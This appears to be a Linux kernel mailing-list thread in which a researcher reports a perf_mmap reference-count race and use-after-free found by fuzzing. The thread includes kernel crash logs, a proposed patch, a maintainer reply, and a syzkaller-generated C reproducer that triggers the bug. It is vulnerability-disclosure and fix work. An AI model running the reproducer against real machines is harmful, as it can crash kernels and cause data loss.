NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26));
NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff);
NONFAILING(*(uint32_t*)0x200000000034 = 2);
NONFAILING(*(uint64_t*)0x200000000038 = 0x29a);
NONFAILING(*(uint64_t*)0x200000000040 = 8);
NONFAILING(*(uint64_t*)0x200000000048 = 0x1800);
NONFAILING(*(uint64_t*)0x200000000050 = 7);
NONFAILING(*(uint32_t*)0x200000000058 = 0x10000);
NONFAILING(*(uint32_t*)0x20000000005c = 1);
NONFAILING(*(uint64_t*)0x200000000060 = 4);
NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f);
NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe);
NONFAILING(*(uint16_t*)0x20000000006e = 0);
NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003);
NONFAILING(*(uint32_t*)0x200000000074 = 0);
NONFAILING(*(uint64_t*)0x200000000078 = 7);
res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0,
/*cpu=*/1ul, /*group=*/r[0], /*flags=PERF_FLAG_FD_OUTPUT*/ 2ul);
if (res != -1)
r[1] = res;
// mmap arguments: [
// addr: VMA[0x1000]
// len: len = 0x1000 (8 bytes)
// prot: mmap_prot = 0x100000b (8 bytes)
// flags: mmap_flags = 0x13 (8 bytes)
// fd: fd (resource)
// offset: intptr = 0x0 (8 bytes)
// ]
syscall(__NR_mmap, /*addr=*/0x200000186000ul, /*len=*/0x1000ul,
/*prot=PROT_GROWSDOWN|PROT_SEM|PROT_WRITE|PROT_READ*/ 0x100000bul,
/*flags=MAP_SHARED_VALIDATE|MAP_FIXED*/ 0x13ul, /*fd=*/r[1],
/*offset=*/0ul);
return 0;
}
|
On Sat, Jan 31, 2026 at 09:21:23PM +0800, 余昊铖 wrote:
Can you turn this into a patch we can apply (properly sent, real name
used, etc.) so that the maintainers can review it and apply it
correctly?
Also, be sure to send this to the correct people, I don't think that
the ext4 developers care that much about perf :)
thanks,
greg k-h
|
{
"author": "Greg KH <gregkh@linuxfoundation.org>",
"date": "Sun, 1 Feb 2026 09:18:40 +0100",
"thread_id": "CAAoXzSqHuQd7k9rp878YBG5gbChgOaProPQ6XBzKpy81JF5sKg@mail.gmail.com.mbox.gz"
}
|
lkml
|
[PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
|
Hello,
I would like to report a reference counting vulnerability in the Linux kernel perf_event subsystem, which I discovered using a modified syzkaller-based kernel fuzzing tool that I developed.
Summary
-------
A local user can trigger a reference count saturation or a use-after-free (UAF) vulnerability in the perf_mmap function. This is caused by a race condition where a ring_buffer object's reference count is incremented after it has already reached zero.
The vulnerability exists in the perf_mmap() function in kernel/events/core.c. While the function uses mmap_mutex to protect the initial buffer setup, it performs subsequent operations (such as map_range) on event->rb outside of the locked scope. If the event is closed or the buffer is detached concurrently, the reference count of the ring_buffer can drop to zero, leading to an 'addition on 0' warning or a UAF when the kernel attempts to access or increment it later.
I verified this on Linux kernel version 6.18.5.
Environment
-----------
- Kernel version: 6.18.5 (the complete config is attached)
- Architecture: x86_64
- Hypervisor: QEMU (Standard PC i440FX + PIIX, BIOS 1.13.0-1ubuntu1.1)
Symptoms and logs
-----------------
The kernel triggers a 'refcount_t: addition on 0; use-after-free' warning followed by a memory leak warning
The full report is as below:
audit: type=1400 audit(1769676568.351:202): avc: denied { open } for pid=21484 comm="syz.6.2386" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 3 PID: 21486 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Modules linked in:
CPU: 3 UID: 0 PID: 21486 Comm: syz.6.2386 Not tainted 6.18.5 #1 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 5c b8 e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f
RSP: 0018:ffff888103c17678 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff888107641190 RCX: ffffffff8137110c
RDX: 0000000000080000 RSI: ffffc90002279000 RDI: ffff88811b3a3e88
RBP: 0000000000000002 R08: fffffbfff7219644 R09: ffffed10236747d2
R10: ffffed10236747d1 R11: ffff88811b3a3e8b R12: 0000000000000000
R13: ffff888002255a10 R14: ffff888002255a00 R15: ffff888107641170
FS: 00007f7ef46f3640(0000) GS:ffff888160a03000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000478 CR3: 000000010698c006 CR4: 0000000000770ff0
DR0: 0000000000000000 DR1: 00000200000000a2 DR2: 00000200000000a2
DR3: 00000200000000a2 DR6: 00000000ffff0ff0 DR7: 0000000000000600
PKRU: 80000000
Call Trace:
<TASK>
__refcount_add include/linux/refcount.h:289 [inline]
__refcount_inc include/linux/refcount.h:366 [inline]
refcount_inc include/linux/refcount.h:383 [inline]
perf_mmap_rb kernel/events/core.c:7005 [inline]
perf_mmap+0x126d/0x1990 kernel/events/core.c:7163
vfs_mmap include/linux/fs.h:2405 [inline]
mmap_file mm/internal.h:167 [inline]
__mmap_new_file_vma mm/vma.c:2413 [inline]
__mmap_new_vma mm/vma.c:2476 [inline]
__mmap_region+0xea5/0x2250 mm/vma.c:2670
mmap_region+0x267/0x350 mm/vma.c:2740
do_mmap+0x769/0xe50 mm/mmap.c:558
vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581
ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604
__do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline]
__se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline]
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f7ef5cabb9d
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007f7ef46f2fc8 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
RAX: ffffffffffffffda RBX: 00007f7ef5f01fa0 RCX: 00007f7ef5cabb9d
RDX: 0000000001000003 RSI: 0000000000002000 RDI: 0000200000ffa000
RBP: 00007f7ef5d2f00a R08: 0000000000000007 R09: 0000000000000000
R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000
R13: 00007f7ef5f01fac R14: 00007f7ef5f02038 R15: 00007f7ef46f3640
</TASK>
---[ end trace 0000000000000000 ]---
EXT4-fs error (device loop0): ext4_mb_generate_buddy:1303: group 0, block bitmap and bg descriptor inconsistent: 219 vs 12386523 free clusters
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 1 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
EXT4-fs (loop0): Total free blocks count 0
EXT4-fs (loop0): Free/Dirty block details
EXT4-fs (loop0): free_blocks=12386304
EXT4-fs (loop0): dirty_blocks=16387
EXT4-fs (loop0): Block reservation details
EXT4-fs (loop0): i_reserved_data_blocks=16387
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 2052 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>
SYZFAIL: failed to recv rpc
fd=3 want=4 recv=0 n=0 (errno 9: Bad file descriptor)
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>
Reproduce
----------
The issue is reproducible using the C reproducer attached. The reproducer triggers the vulnerability by creating a high-frequency race condition between memory mapping and event teardown.
The reproducer follows this execution flow:
1. Event Creation: It initializes a performance monitoring event via perf_event_open(), typically with inherit or specific sample_type flags that necessitate the allocation of a kernel ring_buffer.
2. Multithreaded Hammering: The program spawns multiple threads or forks child processes to perform concurrent operations on the same file descriptor.
3. The Race: Thread A continuously calls mmap() on the perf file descriptor. This enters the kernel-side perf_mmap() function, which briefly acquires the mmap_mutex to set up the buffer but then drops it. While thread B (or the main loop) attempts to close the descriptor or modify the event state, which can trigger the destruction or detachment of the ring_buffer.
4. Vulnerability Trigger: Because perf_mmap() accesses event->rb to perform map_range() after the mmap_mutex has been released, Thread B can drop the buffer's reference count to zero during this unprotected window.
5. Crash/Warning: When Thread A finally reaches the code that increments the reference count or accesses the buffer (e.g., in perf_mmap_rb or map_range), the refcount_t infrastructure detects an "addition on 0," resulting in the KASAN or refcount_warn_saturate report.
Security impact
---------------
The vulnerability allows a local user to compromise system integrity by triggering a reference count saturation or a Use-After-Free (UAF) condition. While the immediate symptom is typically a kernel warning or a Denial of Service through a system hang or panic, especially in environments with panic_on_warn enabled, the underlying memory corruption represents a more significant threat. By causing a ring_buffer object to be accessed after its reference count has reached zero, an attacker may be able to leverage this UAF state to perform heap grooming. If the freed memory is reallocated with a controlled structure, it could potentially be exploited to achieve local privilege escalation, making this a critical issue for multi-user systems or containerized environments where the perf_event interface is accessible.
Patch
--------------
From 34545a4d43adef3147e0ba1c744deb128a05a101 Mon Sep 17 00:00:00 2001
From: 0ne1r0s <yuhaocheng035@gmail.com>
Date: Sat, 31 Jan 2026 21:16:52 +0800
Subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
The issue is caused by a race condition between mmap() and event
teardown. In perf_mmap(), the ring_buffer (rb) is accessed via
map_range() after the mmap_mutex is released. If another thread
closes the event or detaches the buffer during this window, the
reference count of rb can drop to zero, leading to a UAF or
refcount saturation when map_range() or subsequent logic attempts
to use it.
Fix this by extending the scope of mmap_mutex to cover the entire
setup process, including map_range(), ensuring the buffer remains
valid until the mapping is complete.
Signed-off-by: 0ne1r0s <yuhaocheng035@gmail.com>
---
kernel/events/core.c | 42 +++++++++++++++++++++---------------------
1 file changed, 21 insertions(+), 21 deletions(-)
diff --git a/kernel/events/core.c b/kernel/events/core.c
index 2c35acc2722b..7c93f7d057cb 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma)
ret = perf_mmap_aux(vma, event, nr_pages);
if (ret)
return ret;
- }
-
- /*
- * Since pinned accounting is per vm we cannot allow fork() to copy our
- * vma.
- */
- vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
- vma->vm_ops = &perf_mmap_vmops;
- mapped = get_mapped(event, event_mapped);
- if (mapped)
- mapped(event, vma->vm_mm);
-
- /*
- * Try to map it into the page table. On fail, invoke
- * perf_mmap_close() to undo the above, as the callsite expects
- * full cleanup in this case and therefore does not invoke
- * vmops::close().
- */
- ret = map_range(event->rb, vma);
- if (ret)
- perf_mmap_close(vma);
+ /*
+ * Since pinned accounting is per vm we cannot allow fork() to copy our
+ * vma.
+ */
+ vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
+ vma->vm_ops = &perf_mmap_vmops;
+
+ mapped = get_mapped(event, event_mapped);
+ if (mapped)
+ mapped(event, vma->vm_mm);
+
+ /*
+ * Try to map it into the page table. On fail, invoke
+ * perf_mmap_close() to undo the above, as the callsite expects
+ * full cleanup in this case and therefore does not invoke
+ * vmops::close().
+ */
+ ret = map_range(event->rb, vma);
+ if (ret)
+ perf_mmap_close(vma);
+ }
return ret;
}
--
2.51.0
Request
-------
Could you please review this issue and the proposed fix? If this is a confirmed new vulnerability, I would appreciate coordination on a CVE ID.
Best regards,
Haocheng Yu
Zhejiang UniversitySyzkaller hit 'WARNING: refcount bug in perf_mmap' bug.
audit: type=1400 audit(1769331402.322:11): avc: denied { read } for pid=1256 comm="syz.3.17" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 0 PID: 1256 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Modules linked in:
CPU: 0 UID: 0 PID: 1256 Comm: syz.3.17 Not tainted 6.18.5 #1 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 7c 9a e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f
RSP: 0018:ffff8881036bf678 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff8881027387c0 RCX: ffffffff9757110c
RDX: ffff888102cb4800 RSI: 0000000000000008 RDI: ffff88811b228000
RBP: 0000000000000002 R08: fffffbfff3659644 R09: ffffed10206d7e8c
R10: ffffed10206d7e8b R11: ffff8881036bf45f R12: 0000000000000000
R13: ffff88810e816310 R14: ffff88810e816300 R15: ffff8881027387a0
FS: 000055558ca3a540(0000) GS:ffff88817e683000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000078 CR3: 000000010406c005 CR4: 0000000000770ff0
PKRU: 55555554
Call Trace:
<TASK>
__refcount_add include/linux/refcount.h:289 [inline]
__refcount_inc include/linux/refcount.h:366 [inline]
refcount_inc include/linux/refcount.h:383 [inline]
perf_mmap_rb kernel/events/core.c:7005 [inline]
perf_mmap+0x126d/0x1990 kernel/events/core.c:7163
vfs_mmap include/linux/fs.h:2405 [inline]
mmap_file mm/internal.h:167 [inline]
__mmap_new_file_vma mm/vma.c:2413 [inline]
__mmap_new_vma mm/vma.c:2476 [inline]
__mmap_region+0xea5/0x2250 mm/vma.c:2670
mmap_region+0x267/0x350 mm/vma.c:2740
do_mmap+0x769/0xe50 mm/mmap.c:558
vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581
ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604
__do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline]
__se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline]
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f4a5add3b9d
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007ffe1d5a4a68 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
RAX: ffffffffffffffda RBX: 00007f4a5b029fa0 RCX: 00007f4a5add3b9d
RDX: 000000000100000b RSI: 0000000000001000 RDI: 0000200000186000
RBP: 00007f4a5ae5700a R08: 0000000000000004 R09: 0000000000000000
R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000
R13: 0000000000000000 R14: 0000000000001067 R15: 00007f4a5b029fa0
</TASK>
---[ end trace 0000000000000000 ]---
Syzkaller reproducer:
# {Threaded:false Repeat:false RepeatTimes:0 Procs:1 Slowdown:1 Sandbox: SandboxArg:0 Leak:false NetInjection:false NetDevices:false NetReset:false Cgroups:false BinfmtMisc:false CloseFDs:false KCSAN:false DevlinkPCI:false NicVF:false USB:false VhciInjection:false Wifi:false IEEE802154:false Sysctl:false Swap:false UseTmpDir:false HandleSegv:true Trace:false CallComments:true LegacyOptions:{Collide:false Fault:false FaultCall:0 FaultNth:0}}
pkey_mprotect(&(0x7f0000000000/0x2000)=nil, 0x2000, 0x5, 0xffffffffffffffff)
r0 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, 0xffffffffffffffff, 0x8)
mmap(&(0x7f0000002000/0x1000)=nil, 0x1000, 0x0, 0x11, r0, 0x0)
r1 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, r0, 0x2)
mmap(&(0x7f0000186000/0x1000)=nil, 0x1000, 0x100000b, 0x13, r1, 0x0)
C reproducer:
// autogenerated by syzkaller (https://github.com/google/syzkaller)
#define _GNU_SOURCE
#include <endian.h>
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
#ifndef __NR_pkey_mprotect
#define __NR_pkey_mprotect 329
#endif
static __thread int clone_ongoing;
static __thread int skip_segv;
static __thread jmp_buf segv_env;
static void segv_handler(int sig, siginfo_t* info, void* ctx)
{
if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0) {
exit(sig);
}
uintptr_t addr = (uintptr_t)info->si_addr;
const uintptr_t prog_start = 1 << 20;
const uintptr_t prog_end = 100 << 20;
int skip = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0;
int valid = addr < prog_start || addr > prog_end;
if (skip && valid) {
_longjmp(segv_env, 1);
}
exit(sig);
}
static void install_segv_handler(void)
{
struct sigaction sa;
memset(&sa, 0, sizeof(sa));
sa.sa_handler = SIG_IGN;
syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8);
syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8);
memset(&sa, 0, sizeof(sa));
sa.sa_sigaction = segv_handler;
sa.sa_flags = SA_NODEFER | SA_SIGINFO;
sigaction(SIGSEGV, &sa, NULL);
sigaction(SIGBUS, &sa, NULL);
}
#define NONFAILING(...) \
({ \
int ok = 1; \
__atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \
if (_setjmp(segv_env) == 0) { \
__VA_ARGS__; \
} else \
ok = 0; \
__atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \
ok; \
})
#define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off))
#define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \
*(type*)(addr) = \
htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \
(((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len))))
uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};
int main(void)
{
syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul,
/*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
const char* reason;
(void)reason;
install_segv_handler();
intptr_t res = 0;
if (write(1, "executing program\n", sizeof("executing program\n") - 1)) {
}
// pkey_mprotect arguments: [
// addr: VMA[0x2000]
// len: len = 0x2000 (8 bytes)
// prot: mmap_prot = 0x5 (8 bytes)
// key: pkey (resource)
// ]
syscall(__NR_pkey_mprotect, /*addr=*/0x200000000000ul, /*len=*/0x2000ul,
/*prot=PROT_READ|PROT_EXEC*/ 5ul, /*key=*/(intptr_t)-1);
// perf_event_open arguments: [
// attr: ptr[in, perf_event_attr] {
// perf_event_attr {
// type: perf_event_type = 0x2 (4 bytes)
// size: len = 0x80 (4 bytes)
// config0: int8 = 0x8 (1 bytes)
// config1: int8 = 0x1 (1 bytes)
// config2: int8 = 0x8 (1 bytes)
// config3: int8 = 0x1 (1 bytes)
// config4: const = 0x0 (4 bytes)
// sample_freq: int64 = 0x2 (8 bytes)
// sample_type: perf_sample_type = 0x84143 (8 bytes)
// read_format: perf_read_format = 0x10 (8 bytes)
// disabled: int64 = 0x1 (0 bytes)
// inherit: int64 = 0x1 (0 bytes)
// pinned: int64 = 0x1 (0 bytes)
// exclusive: int64 = 0x0 (0 bytes)
// exclude_user: int64 = 0x0 (0 bytes)
// exclude_kernel: int64 = 0x1 (0 bytes)
// exclude_hv: int64 = 0x1 (0 bytes)
// exclude_idle: int64 = 0x1 (0 bytes)
// mmap: int64 = 0x0 (0 bytes)
// comm: int64 = 0x1 (0 bytes)
// freq: int64 = 0x0 (0 bytes)
// inherit_stat: int64 = 0x0 (0 bytes)
// enable_on_exec: int64 = 0x0 (0 bytes)
// task: int64 = 0x1 (0 bytes)
// watermark: int64 = 0x0 (0 bytes)
// precise_ip: int64 = 0x3 (0 bytes)
// mmap_data: int64 = 0x1 (0 bytes)
// sample_id_all: int64 = 0x1 (0 bytes)
// exclude_host: int64 = 0x0 (0 bytes)
// exclude_guest: int64 = 0x0 (0 bytes)
// exclude_callchain_kernel: int64 = 0x1 (0 bytes)
// exclude_callchain_user: int64 = 0x0 (0 bytes)
// mmap2: int64 = 0x1 (0 bytes)
// comm_exec: int64 = 0x1 (0 bytes)
// use_clockid: int64 = 0x0 (0 bytes)
// context_switch: int64 = 0x0 (0 bytes)
// write_backward: int64 = 0x1 (0 bytes)
// namespaces: int64 = 0x0 (0 bytes)
// ksymbol: int64 = 0x0 (0 bytes)
// bpf_event: int64 = 0x1 (0 bytes)
// aux_output: int64 = 0x0 (0 bytes)
// cgroup: int64 = 0x0 (0 bytes)
// text_poke: int64 = 0x0 (0 bytes)
// build_id: int64 = 0x0 (0 bytes)
// inherit_thread: int64 = 0x1 (0 bytes)
// remove_on_exec: int64 = 0x0 (0 bytes)
// sigtrap: int64 = 0x0 (0 bytes)
// __reserved_1: const = 0x0 (8 bytes)
// wakeup_events: int32 = 0x7fff (4 bytes)
// bp_type: perf_bp_type = 0x2 (4 bytes)
// bp_config: union perf_bp_config {
// perf_config_ext: perf_config_ext {
// config1: int64 = 0x29a (8 bytes)
// config2: int64 = 0x8 (8 bytes)
// }
// }
// branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes)
// sample_regs_user: int64 = 0x7 (8 bytes)
// sample_stack_user: int32 = 0x10000 (4 bytes)
// clockid: clock_type = 0x1 (4 bytes)
// sample_regs_intr: int64 = 0x4 (8 bytes)
// aux_watermark: int32 = 0xffffff7f (4 bytes)
// sample_max_stack: int16 = 0xfffe (2 bytes)
// __reserved_2: const = 0x0 (2 bytes)
// aux_sample_size: int32 = 0x8000003 (4 bytes)
// __reserved_3: const = 0x0 (4 bytes)
// sig_data: int64 = 0x7 (8 bytes)
// }
// }
// pid: pid (resource)
// cpu: intptr = 0x1 (8 bytes)
// group: fd_perf (resource)
// flags: perf_flags = 0x8 (8 bytes)
// ]
// returns fd_perf
NONFAILING(*(uint32_t*)0x200000000000 = 2);
NONFAILING(*(uint32_t*)0x200000000004 = 0x80);
NONFAILING(*(uint8_t*)0x200000000008 = 8);
NONFAILING(*(uint8_t*)0x200000000009 = 1);
NONFAILING(*(uint8_t*)0x20000000000a = 8);
NONFAILING(*(uint8_t*)0x20000000000b = 1);
NONFAILING(*(uint32_t*)0x20000000000c = 0);
NONFAILING(*(uint64_t*)0x200000000010 = 2);
NONFAILING(*(uint64_t*)0x200000000018 = 0x84143);
NONFAILING(*(uint64_t*)0x200000000020 = 0x10);
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1));
